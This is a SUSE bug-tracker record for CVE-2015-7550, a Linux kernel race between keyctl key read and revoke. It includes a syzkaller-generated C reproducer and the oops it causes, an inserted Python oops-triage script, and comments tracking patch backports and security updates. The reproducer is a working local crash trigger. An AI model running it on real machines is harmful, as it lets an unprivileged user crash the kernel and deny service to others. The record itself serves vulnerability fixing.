Bug 958951 - (CVE-2015-7550) VUL-0: CVE-2015-7550: kernel: User triggerable crash from race between key read and key revoke
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Priority: P3 - Medium, Severity: Normal
Assigned To: Joey Lee
Security Team bot
https://smash.suse.de/issue/159733/
CVSSv2:RedHat:CVE-2015-7550:4.6:(AV:L...
Reported: 2015-12-14 10:37 UTC by Marcus Meissner
Modified: 2018-10-25 16:27 UTC
Found By: Security Response Team
alnovak: needinfo? (jlee)


Attachments
keyctl-race-fix.patch (812 bytes, patch)
2015-12-14 10:37 UTC, Marcus Meissner
keyctl-gpf.c (948 bytes, text/plain)
2015-12-14 10:41 UTC, Marcus Meissner
0001-KEYS-Fix-race-between-read-and-revoke.patch (3.40 KB, patch)
2015-12-30 09:54 UTC, Joey Lee

Description Marcus Meissner 2015-12-14 10:37:02 UTC
via redhat bugzilla


On upstream commit 6764e5ebd5c62236d082f9ae030674467d0b2779 (Dec 9).

The following program causes GPF in keyctl:

// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>

long r4;

void *thr0(void *arg)
{
	long r5 = syscall(SYS_keyctl, 0x3ul, r4, 0, 0, 0, 0);
	return 0;
}

void *thr1(void *arg)
{
	long r6 = syscall(SYS_keyctl, 0xbul, r4, 0x20000000ul, 0x1000ul, 0, 0);
	return 0;
}

int main()
{
	long r0 = syscall(SYS_mmap, 0x20000000ul, 0x10000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
	memcpy((void*)0x20000e56, "\x75\x73\x65\x72\x00", 5);
	memcpy((void*)0x2000074a, "\x25\x00", 2);
	memcpy((void*)0x20000f77, "\x56\x47\x22\x1d\x9e\xa4\xd3\xf5\x4d\x1b\xd5\xf9\x3f\x92\xd5\xad\x79\xd9\x74\x5a\xda\x21\x45\x09\x3c\xed\x24\x31\x0c\x57\x3f\x4d\xe7\xe0\x3e\x5a\xb2\xb3\xf5\x57\x51\x17\xb7\xa3\x61\xc1\xb7\xc1\xf2\x16\x3a\xb4\x8e\x28\xd0\xcc\x1b\xbb\x4c\x4f\x3e\x90\x6f\x1a\xe2\xe8\x99\x52\x8a\x8a\x10\x6b\x60\xd7\x27\x83\xe0\x70\xc9\x7d\x6d\x25\xa3\xd6\x8c\xf0\x08\xba\xc7\x56\xff\xd6\xd6\x62\xa0\xa5\x54\x5c\xfe\x45\x86\xd3\x39\x6a\xf9\x13\x34\x7a\x0c\xc7\x7e\x87\x44\xb7\x10\x2c\xc5\x75\xe0\x17\x35\xdf\xfe\x98\x6b\xf5\xbc\x0b\xbf\x21\xf8\x6d\x14\x3c\x23\x78\x6e", 137);
	r4 = syscall(SYS_add_key, 0x20000e56ul, 0x2000074aul, 0x20000f77ul, 0x89ul, 0xfffffffffffffffcul, 0);
	pthread_t th[5];
	pthread_create(&th[0], 0, thr0, 0);
	pthread_create(&th[1], 0, thr1, 0);
	pthread_create(&th[2], 0, thr0, 0);
	pthread_create(&th[3], 0, thr1, 0);
	pthread_join(th[0], 0);
	pthread_join(th[1], 0);
	pthread_join(th[2], 0);
	pthread_join(th[3], 0);
	return 0;
}


BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
IP: [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
PGD 35b9b067 PUD 34c71067 PMD 0
Oops: 0000 [#1] SMP
Modules linked in:
CPU: 1 PID: 7020 Comm: a.out Not tainted 4.4.0-rc4+ #53
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: ffff88003243db00 ti: ffff8800364f0000 task.ti: ffff8800364f0000
RIP: 0010:[<ffffffff816870b7>]  [<ffffffff816870b7>] user_read+0x37/0xb0
RSP: 0018:ffff8800364f3ee0  EFLAGS: 00010206
RAX: 0000000000000001 RBX: ffff8800008a8000 RCX: 0000000000000001
RDX: 0000000000000001 RSI: 0000000020000000 RDI: ffff8800008a8000
RBP: ffff8800364f3f00 R08: 0000000000000000 R09: 0000000000000001
R10: ffff88003243db00 R11: ffff88003243e2b8 R12: 0000000000001000
R13: 0000000020000000 R14: 0000000000000000 R15: 0000000000001000
FS:  00007ff559f38700(0000) GS:ffff88003ed00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000010 CR3: 0000000035fe6000 CR4: 00000000000006e0
Stack:
 ffffffffffffffa1 ffff8800008a8020 ffff8800008a8000 0000000020000000
 ffff8800364f3f38 ffffffff81683d7a 00007ff559f38700 0000000000000000
 0000000000000000 00007ff559f389c0 00007ff559f38700 ffff8800364f3f48
Call Trace:
 [<ffffffff81683d7a>] keyctl_read_key+0xba/0xf0 security/keys/keyctl.c:761
 [<     inline     >] SYSC_keyctl security/keys/keyctl.c:1595
 [<ffffffff81684bd4>] SyS_keyctl+0xa4/0x170 security/keys/keyctl.c:1553
 [<ffffffff823fe676>] entry_SYSCALL_64_fastpath+0x16/0x7a arch/x86/entry/entry_64.S:185
Code: 54 49 89 d4 53 48 89 fb e8 27 bc a9 ff 85 c0 74 10 80 3d b0 a7 70 01 00 75 07 48 83 7b 20 00 74 57 4c 8b b3 f0 00 00 00 4d 85 ed <41> 0f b7 5e 10 74 3a 4d 85 e4 74 35 49 39 dc be dc 02 00 00 48
RIP  [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
 RSP <ffff8800364f3ee0>
CR2: 0000000000000010
---[ end trace acbace9643063ebd ]---


References:
https://bugzilla.redhat.com/show_bug.cgi?id=1291197
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7550
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7550
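
A triage helper for the oops quoted above, as an added example that is not part of the original report: it splits a kernel log into oops records and flags those with this bug's shape (a NULL-page fault in user_read reached through keyctl_read_key). It assumes the oops layout shown on this page (4.4-era x86-64); the function names, the timestamps and the second oops (example_drv_poll) are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed sample log: the first oops is trimmed from the report above with
# dmesg-style timestamps added; the second is an invented, unrelated NULL
# dereference used as a negative case.
SAMPLE_LOG = """\
[  512.100001] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
[  512.100002] IP: [<ffffffff816870b7>] user_read+0x37/0xb0
[  512.100003] CPU: 1 PID: 7020 Comm: a.out Not tainted 4.4.0-rc4+ #53
[  512.100004] Call Trace:
[  512.100005]  [<ffffffff81683d7a>] keyctl_read_key+0xba/0xf0
[  512.100006]  [<ffffffff81684bd4>] SyS_keyctl+0xa4/0x170
[  512.100007] Code: 54 49 89 d4 53 48 89 fb
[  512.100008] ---[ end trace acbace9643063ebd ]---
[  900.000001] BUG: unable to handle kernel NULL pointer dereference at 0000000000000028
[  900.000002] IP: [<ffffffffa0001234>] example_drv_poll+0x14/0x60 [example_drv]
[  900.000003] CPU: 0 PID: 811 Comm: exampled Not tainted 4.4.0-rc4+ #53
[  900.000004] Call Trace:
[  900.000005]  [<ffffffff811f0000>] ? do_sys_poll+0x1a0/0x500
[  900.000006] ---[ end trace 0000000000000001 ]---
"""

FAULT_RE = re.compile(r"BUG: unable to handle kernel "
                      r"(?P<kind>NULL pointer dereference|paging request) at (?P<addr>[0-9a-f]+)")
IP_RE = re.compile(r"\b(?:IP|RIP):?\s.*?\]\s+(?P<sym>[A-Za-z_][\w.]*)\+0x[0-9a-f]+/0x[0-9a-f]+")
FRAME_RE = re.compile(r"\[<[^>]*>\]\s+\??\s*(?P<sym>[A-Za-z_][\w.]*)")
COMM_RE = re.compile(r"\bPID: (?P<pid>\d+) Comm: (?P<comm>\S+)")
PAGE_SIZE = 0x1000  # a fault below this is an offset from a NULL struct pointer


@dataclass
class Oops:
    kind: str
    fault_addr: int
    fault_sym: str = ""
    comm: str = ""
    pid: int = -1
    trace: list = field(default_factory=list)


def parse_oopses(text):
    """Return one Oops per 'BUG: unable to handle kernel ...' header in text."""
    oopses, cur, in_trace = [], None, False
    for line in text.splitlines():
        m = FAULT_RE.search(line)
        if m:                                   # header starts a new record
            cur, in_trace = Oops(m["kind"], int(m["addr"], 16)), False
            oopses.append(cur)
            continue
        if cur is None:
            continue
        if "end trace" in line:                 # footer closes the record
            cur = None
            continue
        if "Call Trace:" in line:
            in_trace = True
            continue
        if in_trace:
            m = FRAME_RE.search(line)
            if m:
                cur.trace.append(m["sym"])
                continue
            in_trace = False                    # e.g. "Code:" ends the trace
        m = IP_RE.search(line)
        if m and not cur.fault_sym:             # first IP/RIP line names the faulting function
            cur.fault_sym = m["sym"]
        m = COMM_RE.search(line)
        if m:
            cur.pid, cur.comm = int(m["pid"]), m["comm"]
    return oopses


def matches_key_read_revoke(oops):
    """True for a NULL-page fault in user_read() called from keyctl_read_key()."""
    return (oops.kind == "NULL pointer dereference" and oops.fault_addr < PAGE_SIZE
            and oops.fault_sym == "user_read" and "keyctl_read_key" in oops.trace)


def triage(text):
    return [(o.comm, o.pid, o.fault_sym, matches_key_read_revoke(o)) for o in parse_oopses(text)]

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row)
```
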
Comment 1 Marcus Meissner 2015-12-14 10:37:23 UTC
Created attachment 659189 [details]
keyctl-race-fix.patch

keyctl-race-fix.patch  patch from redhat bugzilla
Comment 2 Marcus Meissner 2015-12-14 10:41:31 UTC
Created attachment 659192 [details]
keyctl-gpf.c

gcc -o keyctl-gpf keyctl-gpf.c -lkeyutils -lpthread


... although it does not trigger the race for me.
Comment 3 Marcus Meissner 2015-12-14 10:45:48 UTC
code is also in sle11-sp1, assuming all affected.
Comment 4 Marcus Meissner 2015-12-14 10:46:15 UTC
also sle10sp3
Comment 5 Swamp Workflow Management 2015-12-14 23:00:33 UTC
bugbot adjusting priority
Comment 7 Joey Lee 2015-12-21 10:35:18 UTC
Did not see the patch on kernel upstream. I will backport it to SLE first.
Comment 8 Borislav Petkov 2015-12-21 10:44:27 UTC
(In reply to Joey Lee from comment #7)
> Did not see the patch on kernel upstream. I will backport it to SLE first.

Looks like a proposed patch to me. I'd wait with backporting until the maintainer takes it.
Comment 9 Borislav Petkov 2015-12-21 10:46:28 UTC
Here's the upstream submission:

https://lkml.kernel.org/r/20151218013426.4200.99083.stgit@warthog.procyon.org.uk
Comment 10 Joey Lee 2015-12-23 03:45:23 UTC
(In reply to Borislav Petkov from comment #9)
> Here's the upstream submission:
> 
> https://lkml.kernel.org/r/20151218013426.4200.99083.stgit@warthog.procyon.org.uk

Thanks, I am waiting for upstream to merge it.

Joey Lee
Comment 11 Joey Lee 2015-12-30 08:00:54 UTC
(In reply to Joey Lee from comment #10)
> (In reply to Borislav Petkov from comment #9)
> > Here's the upstream submission:
> > 
> > https://lkml.kernel.org/r/20151218013426.4200.99083.stgit@warthog.procyon.org.uk
> 
> Thanks, I am waiting for upstream to merge it.
> 
> Joey Lee

OK, the patch got merged to mainline:

commit b4a1b4f5047e4f54e194681125c74c0aa64d637d
Author: David Howells <dhowells@redhat.com>
Date:   Fri Dec 18 01:34:26 2015 +0000

    KEYS: Fix race between read and revoke

    This fixes CVE-2015-7550.

I am backporting...
Comment 12 Joey Lee 2015-12-30 09:54:19 UTC
Created attachment 660548 [details]
0001-KEYS-Fix-race-between-read-and-revoke.patch

Backported patch to SLE12.
Comment 13 Joey Lee 2015-12-30 09:55:12 UTC
I pushed the backport patch to SLE12 and cve/linux-3.0 in my home branch. Waiting for merge.
Comment 14 Joey Lee 2016-01-04 03:25:45 UTC
(In reply to Joey Lee from comment #13)
> I pushed the backport patch to SLE12 and cve/linux-3.0 in my home branch.
> Waiting for merge.

Patch got merged to cve/linux-3.0:

commit 00e3fc6972ecc33f6e4624fcaa04e59449a01050
Author: Lee, Chun-Yi <jlee@suse.com>
Date:   Wed Dec 30 17:50:37 2015 +0800

    KEYS: Fix race between read and revoke (bnc#958951,
    CVE-2015-7550).


Thanks a lot!
Comment 15 Joey Lee 2016-01-04 05:35:31 UTC
Sent patch to openSUSE-42.1 and stable tree, waiting for approval.
Comment 16 Joey Lee 2016-01-05 04:50:51 UTC
SLE12:

commit 7c3a0e1d603a170fd26ce6adcd4f8422238aed42
Author: Lee, Chun-Yi <jlee@suse.com>
Date:   Wed Dec 30 17:29:54 2015 +0800

    KEYS: Fix race between read and revoke (bnc#958951,
    CVE-2015-7550).


openSUSE-42.1:

commit 7d873ccfdfaaf2194eb8e83c3d7cbd36e18e3828
Author: Lee, Chun-Yi <jlee@suse.com>
Date:   Mon Jan 4 13:03:53 2016 +0800

    KEYS: Fix race between read and revoke (bnc#958951,
    CVE-2015-7550).


stable:

commit 1c9407bf98c8a225cdb95af536ff77dfb2aed817
Author: Lee, Chun-Yi <jlee@suse.com>
Date:   Mon Jan 4 13:34:03 2016 +0800

    KEYS: Fix race between read and revoke (bnc#958951,
    CVE-2015-7550).
Comment 17 Joey Lee 2016-01-05 04:51:18 UTC
Set this issue to fixed.
Comment 20 Swamp Workflow Management 2016-01-19 13:19:52 UTC
SUSE-SU-2016:0168-1: An update that solves 8 vulnerabilities and has 26 fixes is now available.

Category: security (important)
Bug References: 758040,902606,924919,935087,937261,943959,945649,949440,951155,951199,951392,951615,951638,952579,952976,956708,956801,956876,957395,957546,957988,957990,958463,958504,958510,958647,958886,958951,959190,959364,959399,959436,959705,960300
CVE References: CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575
Sources used:
SUSE Linux Enterprise Workstation Extension 12 (src):    kernel-default-3.12.51-52.34.1
SUSE Linux Enterprise Software Development Kit 12 (src):    kernel-docs-3.12.51-52.34.3, kernel-obs-build-3.12.51-52.34.1
SUSE Linux Enterprise Server 12 (src):    kernel-default-3.12.51-52.34.1, kernel-source-3.12.51-52.34.1, kernel-syms-3.12.51-52.34.1, kernel-xen-3.12.51-52.34.1
SUSE Linux Enterprise Module for Public Cloud 12 (src):    kernel-ec2-3.12.51-52.34.1
SUSE Linux Enterprise Live Patching 12 (src):    kgraft-patch-SLE12_Update_10-1-2.1
SUSE Linux Enterprise Desktop 12 (src):    kernel-default-3.12.51-52.34.1, kernel-source-3.12.51-52.34.1, kernel-syms-3.12.51-52.34.1, kernel-xen-3.12.51-52.34.1
Comment 21 Bruno Friedmann 2016-01-20 08:31:55 UTC
Is there anything in the pipe to also fix the kernel for the 13.2 and 13.1 versions?
Comment 22 Marcus Meissner 2016-01-20 09:56:59 UTC
fix is apparently not in 13.2 or 13.1 opensuse branches.
Comment 23 Jeff Mahoney 2016-01-20 16:33:07 UTC
It is now.

MR 355037 for openSUSE 13.2
MR 355038 for openSUSE 13.1
Comment 24 Bernhard Wiedemann 2016-01-20 17:00:30 UTC
This is an autogenerated message for OBS integration:
This bug (958951) was mentioned in
https://build.opensuse.org/request/show/355040 13.1 / kernel-source
Comment 25 Bruno Friedmann 2016-01-21 17:03:31 UTC
Sorry to bother you, but I still didn't see a swamp workflow for Leap 42.1
Has an SR really been submitted to openSUSE_Leap_42.1_Update?
Comment 26 Marcus Meissner 2016-01-22 14:30:17 UTC
it is currently in openSUSE:Maintenance:4557 waiting for testing.
Comment 27 Swamp Workflow Management 2016-01-29 13:16:24 UTC
openSUSE-SU-2016:0280-1: An update that solves 10 vulnerabilities and has 18 fixes is now available.

Category: security (important)
Bug References: 865096,865259,913996,950178,950998,952621,954324,954532,954647,955422,956708,957152,957988,957990,958439,958463,958504,958510,958886,958951,959190,959399,960021,960710,961263,961509,962075,962597
CVE References: CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728
Sources used:
openSUSE Leap 42.1 (src):    kernel-debug-4.1.15-8.1, kernel-default-4.1.15-8.1, kernel-docs-4.1.15-8.3, kernel-ec2-4.1.15-8.1, kernel-obs-build-4.1.15-8.2, kernel-obs-qa-4.1.15-8.1, kernel-obs-qa-xen-4.1.15-8.1, kernel-pae-4.1.15-8.1, kernel-pv-4.1.15-8.1, kernel-source-4.1.15-8.1, kernel-syms-4.1.15-8.1, kernel-vanilla-4.1.15-8.1, kernel-xen-4.1.15-8.1
Comment 28 Swamp Workflow Management 2016-02-01 15:28:27 UTC
openSUSE-SU-2016:0301-1: An update that solves 57 vulnerabilities and has 21 fixes is now available.

Category: security (important)
Bug References: 814440,851610,869564,873385,906545,907818,909077,909477,911326,912202,915517,915577,917830,918333,919007,919018,919463,919596,921313,921949,922583,922936,922944,926238,926240,927780,927786,928130,929525,930399,931988,932348,933896,933904,933907,933934,935542,935705,936502,936831,937032,937033,937969,938706,940338,944296,945825,947155,949936,950998,951194,951440,951627,952384,952579,952976,953052,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075
CVE References: CVE-2014-2568,CVE-2014-8133,CVE-2014-8989,CVE-2014-9090,CVE-2014-9419,CVE-2014-9529,CVE-2014-9683,CVE-2014-9715,CVE-2014-9728,CVE-2014-9729,CVE-2014-9730,CVE-2014-9731,CVE-2015-0272,CVE-2015-0777,CVE-2015-1420,CVE-2015-1421,CVE-2015-2041,CVE-2015-2042,CVE-2015-2150,CVE-2015-2666,CVE-2015-2830,CVE-2015-2922,CVE-2015-2925,CVE-2015-3212,CVE-2015-3339,CVE-2015-3636,CVE-2015-4001,CVE-2015-4002,CVE-2015-4003,CVE-2015-4004,CVE-2015-4036,CVE-2015-4167,CVE-2015-4692,CVE-2015-4700,CVE-2015-5157,CVE-2015-5283,CVE-2015-5307,CVE-2015-5364,CVE-2015-5366,CVE-2015-5707,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7833,CVE-2015-7872,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728
Sources used:
openSUSE 13.1 (src):    cloop-2.639-11.22.2, crash-7.0.2-2.22.2, hdjmod-1.28-16.22.2, ipset-6.21.1-2.26.2, iscsitarget-1.4.20.3-13.22.2, kernel-debug-3.11.10-32.1, kernel-default-3.11.10-32.1, kernel-desktop-3.11.10-32.1, kernel-docs-3.11.10-32.3, kernel-ec2-3.11.10-32.1, kernel-pae-3.11.10-32.1, kernel-source-3.11.10-32.1, kernel-syms-3.11.10-32.1, kernel-trace-3.11.10-32.1, kernel-vanilla-3.11.10-32.1, kernel-xen-3.11.10-32.1, ndiswrapper-1.58-22.1, pcfclock-0.44-258.22.1, vhba-kmp-20130607-2.23.1, virtualbox-4.2.36-2.55.1, xen-4.3.4_10-56.1, xtables-addons-2.3-2.22.1
Comment 29 Swamp Workflow Management 2016-02-03 14:18:42 UTC
openSUSE-SU-2016:0318-1: An update that solves 19 vulnerabilities and has 18 fixes is now available.

Category: security (important)
Bug References: 814440,906545,912202,921949,937969,937970,938706,944296,945825,949936,950998,951627,951638,952384,952579,952976,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075
CVE References: CVE-2014-8989,CVE-2014-9529,CVE-2015-5157,CVE-2015-5307,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728
Sources used:
openSUSE 13.2 (src):    bbswitch-0.8-3.15.1, cloop-2.639-14.15.1, crash-7.0.8-15.1, hdjmod-1.28-18.16.1, ipset-6.23-15.1, kernel-debug-3.16.7-32.1, kernel-default-3.16.7-32.1, kernel-desktop-3.16.7-32.1, kernel-docs-3.16.7-32.2, kernel-ec2-3.16.7-32.1, kernel-obs-build-3.16.7-32.2, kernel-obs-qa-3.16.7-32.1, kernel-obs-qa-xen-3.16.7-32.1, kernel-pae-3.16.7-32.1, kernel-source-3.16.7-32.1, kernel-syms-3.16.7-32.1, kernel-vanilla-3.16.7-32.1, kernel-xen-3.16.7-32.1, pcfclock-0.44-260.15.1, vhba-kmp-20140629-2.15.1, virtualbox-4.3.34-37.1, xen-4.4.3_08-38.1, xtables-addons-2.6-15.1
Comment 30 Swamp Workflow Management 2016-02-25 20:19:55 UTC
SUSE-SU-2016:0585-1: An update that solves 17 vulnerabilities and has 54 fixes is now available.

Category: security (important)
Bug References: 812259,855062,867583,899908,902606,924919,935087,937261,937444,938577,940338,940946,941363,942476,943989,944749,945649,947953,949440,949936,950292,951199,951392,951615,952579,952976,954992,955118,955354,955654,956514,956708,957525,957988,957990,958463,958886,958951,959090,959146,959190,959257,959364,959399,959436,959463,959629,960221,960227,960281,960300,961202,961257,961500,961509,961516,961588,961971,962336,962356,962788,962965,963449,963572,963765,963767,963825,964230,964821,965344,965840
CVE References: CVE-2013-7446,CVE-2015-0272,CVE-2015-5707,CVE-2015-7550,CVE-2015-7799,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8569,CVE-2015-8575,CVE-2015-8660,CVE-2015-8767,CVE-2015-8785,CVE-2016-0723,CVE-2016-2069
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    kernel-default-3.12.53-60.30.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    kernel-docs-3.12.53-60.30.2, kernel-obs-build-3.12.53-60.30.2
SUSE Linux Enterprise Server 12-SP1 (src):    kernel-default-3.12.53-60.30.1, kernel-source-3.12.53-60.30.1, kernel-syms-3.12.53-60.30.1, kernel-xen-3.12.53-60.30.1, lttng-modules-2.7.0-3.1
SUSE Linux Enterprise Module for Public Cloud 12 (src):    kernel-ec2-3.12.53-60.30.1
SUSE Linux Enterprise Live Patching 12 (src):    kgraft-patch-SLE12-SP1_Update_3-1-2.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    kernel-default-3.12.53-60.30.1, kernel-source-3.12.53-60.30.1, kernel-syms-3.12.53-60.30.1, kernel-xen-3.12.53-60.30.1
Comment 31 Swamp Workflow Management 2016-04-01 09:32:03 UTC
SUSE-SU-2016:0911-1: An update that solves 23 vulnerabilities and has 42 fixes is now available.

Category: security (important)
Bug References: 758040,904035,912738,915183,924919,933782,937444,940017,940946,942082,947128,948330,949298,951392,951815,952976,953369,954992,955308,955654,955837,955925,956084,956375,956514,956708,956949,957986,957988,957990,958000,958463,958886,958906,958912,958951,959190,959312,959399,959649,959705,961500,961509,961516,961658,962965,963276,963561,963765,963767,964201,964818,966094,966137,966437,966693,967042,967972,967973,967974,967975,968011,968012,968013,969307
CVE References: CVE-2013-7446,CVE-2015-7515,CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2016-0723,CVE-2016-2069,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    kernel-docs-3.0.101-71.2
SUSE Linux Enterprise Server 11-SP4 (src):    kernel-default-3.0.101-71.1, kernel-ec2-3.0.101-71.1, kernel-pae-3.0.101-71.1, kernel-ppc64-3.0.101-71.1, kernel-source-3.0.101-71.1, kernel-syms-3.0.101-71.1, kernel-trace-3.0.101-71.1, kernel-xen-3.0.101-71.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-default-3.0.101-71.1, kernel-pae-3.0.101-71.1, kernel-ppc64-3.0.101-71.1, kernel-trace-3.0.101-71.1, kernel-xen-3.0.101-71.1
SUSE Linux Enterprise Desktop 11-SP4 (src):    kernel-default-3.0.101-71.1, kernel-pae-3.0.101-71.1, kernel-source-3.0.101-71.1, kernel-syms-3.0.101-71.1, kernel-trace-3.0.101-71.1, kernel-xen-3.0.101-71.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-default-3.0.101-71.1, kernel-ec2-3.0.101-71.1, kernel-pae-3.0.101-71.1, kernel-ppc64-3.0.101-71.1, kernel-trace-3.0.101-71.1, kernel-xen-3.0.101-71.1

Product List: SUSE Linux Enterprise Software Development Kit 11-SP4
SUSE Linux Enterprise Server 11-SP4
SUSE Linux Enterprise Server 11-EXTRA
SUSE Linux Enterprise Desktop 11-SP4
SUSE Linux Enterprise Debuginfo 11-SP4
Comment 32 Swamp Workflow Management 2016-04-19 17:15:14 UTC
SUSE-SU-2016:1102-1: An update that solves 23 vulnerabilities and has 43 fixes is now available.

Category: security (important)
Bug References: 758040,904035,912738,915183,924919,933782,937444,940017,940946,942082,947128,948330,949298,951392,951815,952976,953369,954992,955308,955654,955837,955925,956084,956375,956514,956708,956949,957986,957988,957990,958000,958463,958886,958906,958912,958951,959190,959312,959399,959649,959705,961500,961509,961516,961658,962965,963276,963561,963765,963767,964201,964818,966094,966137,966437,966693,967042,967972,967973,967974,967975,968011,968012,968013,969307,969571
CVE References: CVE-2013-7446,CVE-2015-7515,CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2016-0723,CVE-2016-2069,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549
Sources used:
SUSE Linux Enterprise Real Time Extension 11-SP4 (src):    kernel-rt-3.0.101.rt130-51.1, kernel-rt_trace-3.0.101.rt130-51.1, kernel-source-rt-3.0.101.rt130-51.1, kernel-syms-rt-3.0.101.rt130-51.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-rt-3.0.101.rt130-51.1, kernel-rt_debug-3.0.101.rt130-51.1, kernel-rt_trace-3.0.101.rt130-51.1
Comment 33 Swamp Workflow Management 2016-05-03 17:16:42 UTC
SUSE-SU-2016:1203-1: An update that solves 41 vulnerabilities and has 49 fixes is now available.

Category: security (important)
Bug References: 758040,781018,879378,879381,904035,924919,934787,935123,937444,939955,940017,940413,940913,940946,941514,942082,946122,947128,948330,949298,949752,949936,950750,950998,951392,952976,954628,955308,955354,955654,955673,956375,956514,956707,956708,956709,956852,956949,957988,957990,958463,958886,958906,958912,958951,959190,959312,959399,959705,960857,961500,961509,961512,961516,961518,963276,963765,963767,963998,964201,965319,965923,966437,966693,967863,967972,967973,967974,967975,968010,968011,968012,968013,968141,968670,969307,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971360,973570,974646,975945
CVE References: CVE-2013-7446,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-3955
Sources used:
SUSE OpenStack Cloud 5 (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Manager Proxy 2.1 (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Manager 2.1 (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Linux Enterprise Server 11-SP3-LTSS (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-ppc64-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
